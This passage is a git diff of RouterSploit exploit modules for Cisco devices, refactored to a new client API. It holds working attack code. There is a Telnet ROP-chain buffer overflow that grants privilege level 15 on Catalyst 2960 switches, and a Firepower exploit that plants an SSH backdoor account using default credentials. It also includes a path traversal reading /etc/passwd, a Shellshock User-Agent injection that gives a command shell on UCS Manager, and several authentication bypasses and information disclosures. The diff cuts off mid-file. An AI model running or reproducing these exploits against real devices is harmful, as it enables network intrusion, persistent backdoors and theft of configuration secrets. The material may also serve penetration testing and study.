"DDDD" + - # +16(+0) r1 points here at third gadget - "EEEE" + - # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; - "\x00\x06\x7b\x5c" + - # +8 r1+8 = 0x23d55c8 - "\x02\x3d\x55\xc8" + - # +12 - "FFFF" + - # +16(+0) r1 points here at fourth gadget - "GGGG" + - # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr; - "\x00\x6c\xb3\xa0" + - "{FUNC_PRIVILEGE_LEVEL}" + - # +12 - "HHHH" + - # +16(+0) r1 points here at fifth gadget - "IIII" + - # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; - "\x01\x4a\xcf\x98" + - # +8 r1 points here at third gadget - "JJJJ" + - # +12 - "KKKK" + - # +16 - "LLLL" + - # +20 original execution flow return addr - "\x01\x14\xe7\xec" + - ":15:" + "\xff\xf0" - ), - "func_is_cluster_mode": { - # +12 set address of func that rets 1 - "set": "\x00\x00\x99\x9c", - # unset - "unset": "\x00\x04\xeA\xe0" + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(23, "Target Telnet port") + + action = OptString('set', 'set / unset credless authentication for Telnet service') + device = OptInteger(-1, 'Target device - use "show devices"') + + def __init__(self): + self.payloads = [ + # Cisco Catalyst 2960 IOS 12.2(55)SE1 + { + "template": ( + "\xff\xfa\x24\x00" + + "\x03CISCO_KITS\x012:" + + "A" * 116 + + # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; + "\x00\x00\x37\xb4" + + # next bytes are shown as offsets from r1 + # +8 address of pointer to is_cluster_mode function - 0x34 + "\x02\x2c\x8b\x74" + + "{FUNC_IS_CLUSTER_MODE}" + + # +16(+0) r1 points here at second gadget + "BBBB" + + # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr; + "\x00\xdf\xfb\xe8" + + # +8 + "CCCC" + + # +12 + "DDDD" + + # +16(+0) r1 points here at third gadget + "EEEE" + + # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; + "\x00\x06\x78\x8c" + + # +8 r1+8 = 0x022c8b60 + "\x02\x2c\x8b\x60" + + # +12 + "FFFF" + + # +16(+0) r1 points here at fourth gadget + "GGGG" + + # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr; + "\x00\x6b\xa1\x28" + + "{FUNC_PRIVILEGE_LEVEL}" + + # +12 + "HHHH" + + # +16(+0) r1 points here at fifth gadget + "IIII" + + # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; + "\x01\x48\xe5\x60" + + # +8 r1 points here at third gadget + "JJJJ" + + # +12 + "KKKK" + + # +16 + "LLLL" + + # +20 original execution flow return addr + "\x01\x13\x31\xa8" + + ":15:" + "\xff\xf0" + ), + "func_is_cluster_mode": { + # +12 set address of func that rets 1 + "set": "\x00\x00\x99\x80", + # unset + "unset": "\x00\x04\xea\x58" + }, + "func_privilege_level": { + # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr; + "set": "\x00\x12\x52\x1c", + # unset + "unset": "\x00\x04\xe6\xf0" + } }, - "func_privilege_level": { - # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; - "set": "\x00\x27\x0b\x94", - # unset - "unset": "\x00\x04\xe7\x78" + + # Cisco Catalyst 2960 IOS 12.2(55)SE11 + { + "template": ( + "\xff\xfa\x24\x00" + + "\x03CISCO_KITS\x012:" + + "A" * 116 + + # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; + "\x00\x00\x37\xb4" + + # next bytes are shown as offsets from r1 + # +8 address of pointer to is_cluster_mode function - 0x34 + "\x02\x3d\x55\xdc" + + "{FUNC_IS_CLUSTER_MODE}" + + # +16(+0) r1 points here at second gadget + "BBBB" + + # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr; + "\x00\xe1\xa9\xf4" + + # +8 + "CCCC" + + # +12 + "DDDD" + + # +16(+0) r1 points here at third gadget + "EEEE" + + # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; + "\x00\x06\x7b\x5c" + + # +8 r1+8 = 0x23d55c8 + "\x02\x3d\x55\xc8" + + # +12 + "FFFF" + + # +16(+0) r1 points here at fourth gadget + "GGGG" + + # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr; + "\x00\x6c\xb3\xa0" + + "{FUNC_PRIVILEGE_LEVEL}" + + # +12 + "HHHH" + + # +16(+0) r1 points here at fifth gadget + "IIII" + + # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; + "\x01\x4a\xcf\x98" + + # +8 r1 points here at third gadget + "JJJJ" + + # +12 + "KKKK" + + # +16 + "LLLL" + + # +20 original execution flow return addr + "\x01\x14\xe7\xec" + + ":15:" + "\xff\xf0" + ), + "func_is_cluster_mode": { + # +12 set address of func that rets 1 + "set": "\x00\x00\x99\x9c", + # unset + "unset": "\x00\x04\xeA\xe0" + }, + "func_privilege_level": { + # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; + "set": "\x00\x27\x0b\x94", + # unset + "unset": "\x00\x04\xe7\x78" + } } - } - ] + ] def run(self): if self.device < 0 or self.device >= len(self.payloads): @@ -184,13 +174,11 @@ def run(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(10.0) - s.connect((self.target, int(self.telnet_port))) print_status("Connection OK") print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024)))) - except Exception: + except: print_error("Connection failed") return @@ -211,9 +199,9 @@ def run(self): if self.action == 'set': print_status("Connecting to Telnet service...") try: - t = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10) + t = telnetlib.Telnet(self.target, int(self.telnet_port)) t.interact() - except Exception: + except: print_error("Exploit failed") else: print_status("Check if Telnet authentication was set back") diff --git a/routersploit/modules/exploits/routers/cisco/dpc2420_info_disclosure.py b/routersploit/modules/exploits/routers/cisco/dpc2420_info_disclosure.py index c255ac4f2..412aaaf4f 100644 --- a/routersploit/modules/exploits/routers/cisco/dpc2420_info_disclosure.py +++ b/routersploit/modules/exploits/routers/cisco/dpc2420_info_disclosure.py @@ -1,42 +1,32 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Cisco DPC2420 Information Disclosure vulnerability. - If the target is vulnerable it allows to read sensitive information from the configuration file. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'Cisco DPC2420 Info Disclosure', - 'description': 'Module exploits Cisco DPC2420 information disclosure vulnerability ' - 'which allows reading sensitive information from the configuration file.', - 'authors': [ - 'Facundo M. de la Cruz (tty0) ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Cisco DPC2420 Info Disclosure", + "description": "Module exploits Cisco DPC2420 information disclosure vulnerability " + "which allows reading sensitive information from the configuration file.", + "authors": [ + "Facundo M. de la Cruz (tty0) ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/23250/', + "references": [ + "https://www.exploit-db.com/exploits/23250/", ], - 'devices': [ - 'Cisco DPC2420', + "devices": [ + "Cisco DPC2420", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(8080, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(8080, "Target HTTP port") def run(self): - url = "{}:{}/filename.gwc".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/filename.gwc", + ) if response is None: return @@ -48,9 +38,10 @@ def run(self): @mute def check(self): - url = "{}:{}/filename.gwc".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/filename.gwc", + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/cisco/firepower_management60_path_traversal.py b/routersploit/modules/exploits/routers/cisco/firepower_management60_path_traversal.py index 3759c7214..16ceab246 100644 --- a/routersploit/modules/exploits/routers/cisco/firepower_management60_path_traversal.py +++ b/routersploit/modules/exploits/routers/cisco/firepower_management60_path_traversal.py @@ -1,48 +1,36 @@ import requests +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - print_info, - mute, - validators, - http_request, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Cisco Firepower Management 6.0 Path Traversal vulnerability. - If the target is vulnerable, it is possible to retrieve content of the arbitrary files. - """ + +class Exploit(HTTPClient): __info__ = { - 'name': 'Cisco Firepower Management 6.0 Path Traversal', - 'description': 'Module exploits Cisco Firepower Management 6.0 Path Traversal vulnerability.' - 'If the target is vulnerable, it is possible to retrieve content of the arbitrary files.', - 'authors': [ - 'Matt', # vulnerability discovery - 'sinn3r', # Metasploit module - 'Marcin Bury ', # routersploit module + "name": "Cisco Firepower Management 6.0 Path Traversal", + "description": "Module exploits Cisco Firepower Management 6.0 Path Traversal vulnerability. " + "If the target is vulnerable, it is possible to retrieve content of the arbitrary files.", + "authors": [ + "Matt", # vulnerability discovery + "sinn3r", # Metasploit module + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6435', - 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking', + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6435", + "https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking", ], - 'devices': [ - 'Cisco Firepower Management Console 6.0' + "devices": [ + "Cisco Firepower Management Console 6.0", ], } - target = exploits.Option('', 'Target IP address', validators=validators.url) - port = exploits.Option(443, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - path = exploits.Option('/etc/passwd', 'File to read through vulnerability') - username = exploits.Option('admin', 'Default username to log in') - password = exploits.Option('Admin123', 'Default password to log in') + path = OptString("/etc/passwd", 'File to read through vulnerability') + username = OptString("admin", 'Default username to log in') + password = OptString("Admin123", 'Default password to log in') - session = None + def __init__(self): + self.session = None def run(self): self.session = requests.Session() @@ -52,9 +40,14 @@ def run(self): print_status("Trying to authenticate") if self.login(): file_path = "../../..{}".format(self.path) - url = "{}:{}/events/reports/view.cgi?download=1&files={}%00".format(self.target, self.port, file_path) + path = "/events/reports/view.cgi?download=1&files={}%00".format(file_path) + print_status("Requesting: {}".format(file_path)) - response = http_request(method="GET", url=url, session=self.session) + response = self.http_request( + method="GET", + path=path, + session=self.session + ) if response is None: print_error("Exploit failed") @@ -74,23 +67,32 @@ def run(self): @mute def check(self): - url = "{}:{}/login.cgi?logout=1".format(self.target, self.port) + response = self.http_request( + method="GET", + path="/login.cgi?logout=1" + ) - response = http_request(method="GET", url=url) - - if response is not None and "6.0.1" in response.content: + if response is not None and "6.0.1" in response.text: return True # target is vulnerable return False # target is not vulnerable def login(self): - url = "{}:{}/login.cgi?logout=1".format(self.target, self.port) - - data = {"username": self.username, - "password": self.password, - "target": ""} + data = { + "username": self.username, + "password": self.password, + "target": "" + } + + response = self.http_request( + method="POST", + path="/login.cgi?logout=1", + data=data, + allow_redirects=False, + timeout=30, + session=self.session + ) - response = http_request(method="POST", url=url, data=data, allow_redirects=False, timeout=30, session=self.session) if response is None: return False diff --git a/routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py b/routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py index 319d79614..1996fbfec 100644 --- a/routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py +++ b/routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py @@ -1,54 +1,39 @@ -import requests -import paramiko -import re - -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - mute, - validators, - http_request, - random_text, - ssh_interactive -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Cisco Firepower Management 6.0 Remote Code Execution vulnerability. - If the target is vulnerable, it is possible to retrieve content of the arbitrary files. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient +from routersploit.core.ssh.ssh_client import SSHClient + + +class Exploit(SSHClient, HTTPClient): __info__ = { - 'name': 'Cisco Firepower Management 6.0 RCE', - 'description': 'Module exploits Cisco Firepower Management 6.0 Remote Code Execution vulnerability.' - 'If the target is vulnerable, it is create backdoor account and authenticate through SSH service.', - 'authors': [ - 'Matt', # vulnerability discovery - 'sinn3r', # Metasploit module - 'Marcin Bury ', # routersploit module + "name": "Cisco Firepower Management 6.0 RCE", + "description": "Module exploits Cisco Firepower Management 6.0 Remote Code Execution vulnerability. " + "If the target is vulnerable, it is create backdoor account and authenticate through SSH service.", + "authors": [ + "Matt", # vulnerability discovery + "sinn3r", # Metasploit module + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6433', - 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking', + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6433", + "https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking", ], - 'devices': [ - 'Cisco Firepower Management Console 6.0' + "devices": [ + "Cisco Firepower Management Console 6.0" ], } - target = exploits.Option('', 'Target IP address', validators=validators.url) - port = exploits.Option(443, 'Target Port', validators=validators.integer) - ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.integer) + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(443, "Target HTTP port") + ssh_port = OptPort(22, "Target SSH Port") - username = exploits.Option('admin', 'Default username to log in') - password = exploits.Option('Admin123', 'Default password to log in') + username = OptString("admin", "Default username to log in") + password = OptString("Admin123", "Default password to log in") - newusername = exploits.Option('', 'New backdoor username (Default: Random)') - newpassword = exploits.Option('', 'New backdoor password (Default: Random)') + newusername = OptString("", "New backdoor username (Default: Random)") + newpassword = OptString("", "New backdoor password (Default: Random)") - session = None + def __init__(self): + self.session = None def run(self): self.session = requests.Session() @@ -57,9 +42,9 @@ def run(self): print_success("Target seems to be vulnerable") if self.login(): if not self.newusername: - self.newusername = random_text(8) + self.newusername = utils.random_text(8) if not self.newpassword: - self.newpassword = random_text(8) + self.newpassword = utils.random_text(8) self.create_ssh_backdoor(self.newusername, self.newpassword) @@ -72,8 +57,10 @@ def run(self): @mute def check(self): - url = "{}:{}/img/favicon.png?v=6.0.1-1213".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/img/favicon.png?v=6.0.1-1213", + ) if response is not None and response.status_code == 200: ssh = paramiko.SSHClient() @@ -82,23 +69,30 @@ def check(self): target = self.target.replace("http://", "").replace("https://", "") try: - ssh.connect(target, self.ssh_port, timeout=5, username=random_text(8), password=random_text(8)) + ssh.connect(target, self.ssh_port, timeout=5, username=utils.random_text(8), password=utils.random_text(8)) except paramiko.AuthenticationException: return True # target is vulnerable - except Exception: + except: pass return False # target is not vulnerable def login(self): - url = "{}:{}/login.cgi?logout=1".format(self.target, self.port) - - data = {"username": self.username, - "password": self.password, - "target": ""} + data = { + "username": self.username, + "password": self.password, + "target": "" + } print_status("Trying to authenticate") - response = http_request(method="POST", url=url, data=data, allow_redirects=False, session=self.session) + response = self.http_request( + method="POST", + path="/login.cgi?logout=1", + data=data, + allow_redirects=False, + session=self.session, + ) + if response is None: return False @@ -111,7 +105,6 @@ def login(self): return False def create_ssh_backdoor(self, username, password): - url = "{}:{}/DetectionPolicy/rules/rulesimport.cgi".format(self.target, self.port) sh_name = 'exploit.sh' sf_action_id = self.get_sf_action_id() @@ -119,15 +112,22 @@ def create_ssh_backdoor(self, username, password): print_status("Attempting to create SSH backdoor") - multipart_form_data = {"action_submit": (None, "Import"), - "source": (None, "file"), - "manual_update": (None, "1"), - "sf_action_id": (None, sf_action_id), - "file": (sh_name, payload)} + multipart_form_data = { + "action_submit": (None, "Import"), + "source": (None, "file"), + "manual_update": (None, "1"), + "sf_action_id": (None, sf_action_id), + "file": (sh_name, payload) + } try: - http_request(method="POST", url=url, files=multipart_form_data, session=self.session) - except Exception: + self.http_request( + method="POST", + path="/DetectionPolicy/rules/rulesimport.cgi", + files=multipart_form_data, + session=self.session + ) + except: pass return @@ -135,9 +135,11 @@ def create_ssh_backdoor(self, username, password): def get_sf_action_id(self): print_status("Attempting to obtain sf_action_id from rulesimport.cgi") - url = "{}:{}/DetectionPolicy/rules/rulesimport.cgi".format(self.target, self.port) - - response = http_request(method="GET", url=url, session=self.session) + response = self.http_request( + method="GET", + path="/DetectionPolicy/rules/rulesimport.cgi", + session=self.session + ) if response is None: return None @@ -157,7 +159,7 @@ def init_ssh_session(self, username, password): target = self.target.replace("http://", "").replace("https://", "") try: ssh.connect(target, self.ssh_port, timeout=5, username=username, password=password) - except Exception: + except: ssh.close() else: print_success("SSH - Successful authentication") diff --git a/routersploit/modules/exploits/routers/cisco/ios_http_authorization_bypass.py b/routersploit/modules/exploits/routers/cisco/ios_http_authorization_bypass.py index 424d88160..2908085d1 100644 --- a/routersploit/modules/exploits/routers/cisco/ios_http_authorization_bypass.py +++ b/routersploit/modules/exploits/routers/cisco/ios_http_authorization_bypass.py @@ -1,49 +1,42 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - This exploit targets a vulnerability in the Cisco IOS HTTP Server. - By sending a GET request for the url "http://ip_address/level/{num}/exec/..", - it is possible to bypass authentication and execute any command. - Example: http://10.0.0.1/level/99/exec/show/startup/config - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Cisco IOS HTTP Unauthorized Administrative Access', - 'description': 'HTTP server for Cisco IOS 11.3 to 12.2 allows attackers ' - 'to bypass authentication and execute arbitrary commands, ' - 'when local authorization is being used, by specifying a high access level in the URL.', - 'authors': [ - 'renos stoikos ' # routesploit module + "name": "Cisco IOS HTTP Unauthorized Administrative Access", + "description": "HTTP server for Cisco IOS 11.3 to 12.2 allows attackers " + "to bypass authentication and execute arbitrary commands, " + "when local authorization is being used, by specifying a high access level in the URL.", + "authors": [ + "renos stoikos " # routesploit module ], - 'references': [ - 'http://www.cvedetails.com/cve/cve-2001-0537', + "references": [ + "http://www.cvedetails.com/cve/cve-2001-0537", ], - 'devices': [ - ' IOS 11.3 -> 12.2 are reportedly vulnerable.', + "devices": [ + "IOS 11.3 -> 12.2 are reportedly vulnerable", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config') - access_level = None + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + show_command = OptString("show startup-config", "Command to be executed e.g show startup-config") + + def __init__(self): + self.access_level = None def run(self): if self.check(): print_success("Target is vulnerable") - url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, self.access_level, self.show_command) - response = http_request(method="GET", url=url) + + path = "/level/{}/exec/-/{}".format(self.access_level, self.show_command) + response = self.http_request( + method="GET", + path=path + ) if response is None: print_error("Could not execute command") # target is not vulnerable return @@ -56,8 +49,11 @@ def run(self): @mute def check(self): for num in range(16, 100): - url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command) - response = http_request(method="GET", url=url) + path = "/level/{}/exec/-/{}".format(num, self.show_command) + response = self.http_request( + method="GET", + path=path + ) if response is None: # target does not respond break diff --git a/routersploit/modules/exploits/routers/cisco/secure_acs_bypass.py b/routersploit/modules/exploits/routers/cisco/secure_acs_bypass.py index 230a5c539..45d2f2393 100644 --- a/routersploit/modules/exploits/routers/cisco/secure_acs_bypass.py +++ b/routersploit/modules/exploits/routers/cisco/secure_acs_bypass.py @@ -1,48 +1,37 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - mute, - validators, - http_request, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Cisco Secure ACS Unauthorized Password Change vulnerability. - If the target is vulnerable, it is possible to change user's password. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Cisco Secure ACS Unauthorized Password Change', - 'description': 'Module exploits an authentication bypass issue which allows arbitrary' - 'password change requests to be issued for any user in the local store.' - 'Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well' - 'as version 5.2 with either no patches or patches 1 and 2 are vulnerable.', - 'authors': [ - 'Jason Kratzer ', # vulnerability discovery & metasploit module - 'Marcin Bury ', # routersploit module + "name": "Cisco Secure ACS Unauthorized Password Change", + "description": "Module exploits an authentication bypass issue which allows arbitrary " + "password change requests to be issued for any user in the local store. " + "Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well " + "as version 5.2 with either no patches or patches 1 and 2 are vulnerable.", + "authors": [ + "Jason Kratzer ", # vulnerability discovery & metasploit module + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html', + "references": [ + "http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html", ], - 'devices': [ - 'Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed', - 'Cisco Secure ACS version 5.2 without any patches installed', - 'Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed' + "devices": [ + "Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed", + "Cisco Secure ACS version 5.2 without any patches installed", + "Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed", ], } - target = exploits.Option('', 'Target IP address', validators=validators.url) - port = exploits.Option(443, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(443, "Target HTTP port") + ssl = OptBool("true", "SSL enabled: true/false") - path = exploits.Option('/PI/services/UCP/', 'Path to UCP WebService') - username = exploits.Option('', 'Username to use') - password = exploits.Option('', 'Password to use') + path = OptString("/PI/services/UCP/", "Path to UCP WebService") + username = OptString("", "Username to use") + password = OptString("", "Password to use") def run(self): - url = "{}:{}{}".format(self.target, self.port, self.path) headers = {'SOAPAction': '"changeUserPass"'} data = ('' + '\r\n' @@ -62,7 +51,12 @@ def run(self): print_status("Issuing password change request for: " + self.username) - response = http_request(method="POST", url=url, data=data, headers=headers) + response = self.http_request( + method="POST", + path=self.path, + data=data, + headers=headers + ) if response is None: print_error("Exploit failed. Target seems to be not vulnerable.") diff --git a/routersploit/modules/exploits/routers/cisco/ucm_info_disclosure.py b/routersploit/modules/exploits/routers/cisco/ucm_info_disclosure.py index 98098823e..951f95fe3 100644 --- a/routersploit/modules/exploits/routers/cisco/ucm_info_disclosure.py +++ b/routersploit/modules/exploits/routers/cisco/ucm_info_disclosure.py @@ -1,41 +1,29 @@ -import socket +from routersploit.core.exploit import * +from routersploit.core.tcp.udp_client import UDPClient -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - print_info, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Cisco UCM Information Disclosure vulnerability. - If the target is vulnerable, it is possible to read sensitive information through TFTP service. - """ +class Exploit(UDPClient): __info__ = { - 'name': 'Cisco UCM Info Disclosure', - 'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. ' - 'If the target is vulnerable it is possible to read sensitive information through TFTP service.', - 'authors': [ - 'Daniel Svartman ', # routersploit module + "name": "Cisco UCM Info Disclosure", + "description": "Module exploits information disclosure vulnerability in Cisco UCM devices. " + "If the target is vulnerable it is possible to read sensitive information through TFTP service.", + "authors": [ + "Daniel Svartman ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/30237/', - 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7030', + "references": [ + "https://www.exploit-db.com/exploits/30237/", + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7030", ], - 'devices': [ - 'Cisco UCM', + "devices": [ + "Cisco UCM", ], } - target = exploits.Option('', 'Target IP address', validators=validators.address) + target = OptIP("", "Target IPv4 or IPv6 address") - payload = "\x00\x01" + "SPDefault.cnf.xml" + "\x00" + "netascii" + "\x00" + def __init__(self): + self.payload = b'\x00\x01' + b'SPDefault.cnf.xml' + b'\x00' + b'netascii' + b'\x00' def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -46,7 +34,7 @@ def run(self): try: response = sock.recv(2048) - except Exception: + except: print_error("Exploit failed - device seems to be not vulnerable") return @@ -67,7 +55,7 @@ def check(self): try: response = sock.recv(2048) - except Exception: + except: return False # target is not vulnerable if len(response) and "UseUserCredential" in response: diff --git a/routersploit/modules/exploits/routers/cisco/ucs_manager_rce.py b/routersploit/modules/exploits/routers/cisco/ucs_manager_rce.py index 7f35a8c24..0bf90c569 100644 --- a/routersploit/modules/exploits/routers/cisco/ucs_manager_rce.py +++ b/routersploit/modules/exploits/routers/cisco/ucs_manager_rce.py @@ -1,68 +1,48 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - print_info, - random_text, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on operating system level. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Cisco UCS Manager RCE', - 'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which ' - 'allows executing commands on operating system level.', - 'authors': [ - 'thatchriseckert', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Cisco UCS Manager RCE", + "description": "Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which " + "allows executing commands on operating system level.", + "authors": [ + "thatchriseckert", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/39568/', - 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash', + "references": [ + "https://www.exploit-db.com/exploits/39568/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash", ], - 'devices': [ - 'Cisco UCS Manager 2.1 (1b)', + "devices": [ + "Cisco UCS Manager 2.1 (1b)", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") - self.command_loop() + shell(self) else: print_error("Target is not vulnerable") - def command_loop(self): - while 1: - cmd = raw_input("cmd > ") - - if cmd in ['exit', 'quit']: - return - - print_info(self.execute(cmd)) - def execute(self, cmd): - mark = random_text(32) - url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port) + mark = utils.random_text(32) headers = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark) } - response = http_request(method="GET", url=url, headers=headers) + response = self.http_request( + method="GET", + path="/ucsm/isSamInstalled.cgi", + headers=headers + ) if response is None: return "" @@ -77,7 +57,7 @@ def execute(self, cmd): @mute def check(self): - mark = random_text(32) + mark = utils.random_text(32) cmd = "echo {}".format(mark) response = self.execute(cmd) diff --git a/routersploit/modules/exploits/routers/cisco/unified_multi_path_traversal.py b/routersploit/modules/exploits/routers/cisco/unified_multi_path_traversal.py index 5298bf5e0..5cae7fee9 100644 --- a/routersploit/modules/exploits/routers/cisco/unified_multi_path_traversal.py +++ b/routersploit/modules/exploits/routers/cisco/unified_multi_path_traversal.py @@ -1,54 +1,45 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Path Traversal vulnerability in Cisco Unified Communications Manager, - Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices. - If the target is vulnerable it allows to read files from the filesystem. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Cisco Unified Multi Path Traversal', - 'description': 'Module exploits path traversal vulnerability in Cisco Unified Communications Manager, ' - 'Cisco Unified Contact Center Express and 